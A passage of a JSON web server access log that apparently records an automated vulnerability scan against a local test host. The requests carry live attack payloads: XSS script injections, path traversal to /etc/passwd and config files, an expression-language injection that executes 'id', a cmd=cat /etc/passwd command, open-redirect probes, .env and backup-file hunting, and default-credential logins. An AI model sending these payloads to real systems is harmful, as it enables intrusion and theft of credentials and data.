+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/media/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", 